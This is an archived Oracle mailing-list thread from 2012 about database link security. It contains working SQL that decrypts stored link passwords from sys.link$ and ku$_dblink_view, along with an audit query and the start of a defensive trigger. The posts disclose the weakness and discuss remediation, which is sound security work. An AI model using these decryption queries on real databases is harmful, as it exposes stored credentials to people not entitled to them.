RE: Database Link Security et al

From: Powell, Mark <mark.powell2_at_hp.com>
Date: Wed, 28 Nov 2012 19:16:05 +0000
Message-ID: <1E24812FBE5611419EFAFC488D7CCDD112174A5A_at_G5W2734.americas.hpqcorp.net>

I was unable to read the ku$ view as a DBA so if you have to be a sysdba user to read the view how much of a problem is this really?

-----Original Message-----
From: oracle-l-bounce_at_freelists.org [mailto:oracle-l-bounce_at_freelists.org] On Behalf Of oracle_at_ukcert.org.uk Sent: Wednesday, November 28, 2012 12:19 PM To: oracle-l_at_freelists.org
Subject: Re: Database Link Security et al

Hi ****

Your question below is a good one, as I have had a number of other direct offline emails about the same topic since my original posting, which I will answer here in one go.

The solution proposed of restricting access to sys.link$ is the well known remediation - but it does not solve this issue unfortunately, as you will see below the dblink ciphertexts are selectable through ku$_dblink_view as well, hence the wider visibility of the link passwords.

SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view;

NAME

USERID

PASSWD

TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

(11.2.0.1)

I will be presenting additional new research, exclusive to UKOUG, on Monday.

Cheers,
Paul
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62

On 11/27/2012, "********" <*********_at_*****.com> wrote:

>Hi Paul
>Could you share the paper if that is ok.
>I am interested in the automated solution for the db link security issue.
>ONe thing is basically restrict access to link$.
>
>Thank you
>****
>
>
>
>On Sun, Nov 25, 2012 at 12:18 PM, <oracle_at_ukcert.org.uk> wrote:
>
>>
>> So, users can decrypt dblink passwords as the key is included in the
>> ciphertext... -->
>>
>> SQL> select name, userid,
>> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
>> 4353, (substr(passwordx,3,16)))) from sys.link$ where
>> name='TEST_LINK';
>>
>> NAME
>>
>> ---------------------------------------------------------------------
>> -----------
>> USERID
>> ------------------------------
>> PASSWORD
>>
>> ---------------------------------------------------------------------
>> -----------
>> TEST_LINK
>> DBLINK_ACCOUNT
>> MYPW
>>
>> ..one saving grace is that we can now identify incoming db links
>> using this..
>>
>> select userid, terminal, comment$text from sys.aud$ where
>> comment$text like 'DBLINK%';
>> USERID NTIMESTAMP# USERHOST COMMENT$TEXT
>> ------------ ----------------- ------- --------------
>> DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO:
>> (SOURCE_GLOBAL_NAME=orcl.4294967295)
>>
>> -->could be too late though so best to take a few precautions in
>> advance... preferably automated...
>>
>> ..Same with lack of profiles on SYS account. Sometimes easier to fix
>> ourselves..
>>
>> create or replace trigger sys_throttler.tra_servererror_ora1017
>> after servererror on database
>> declare
>> l_db_usr varchar2 (32);

--
http://www.freelists.org/webpage/oracle-l


--
http://www.freelists.org/webpage/oracle-l

Received on Wed Nov 28 2012 - 20:16:05 CET

This message: [ Message body ]
Next message: Ram Raman: "Re: [Semi-OT] Resources for data modeling and data warehuosing"
Previous message: Bobby Curtis: "Test Test - Delete please"
In reply to: oracle_at_ukcert.org.uk: "Re: Database Link Security et al"
Next in thread: rjamya: "Re: Database Link Security et al"
Reply: rjamya: "Re: Database Link Security et al"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ]

Original text of this message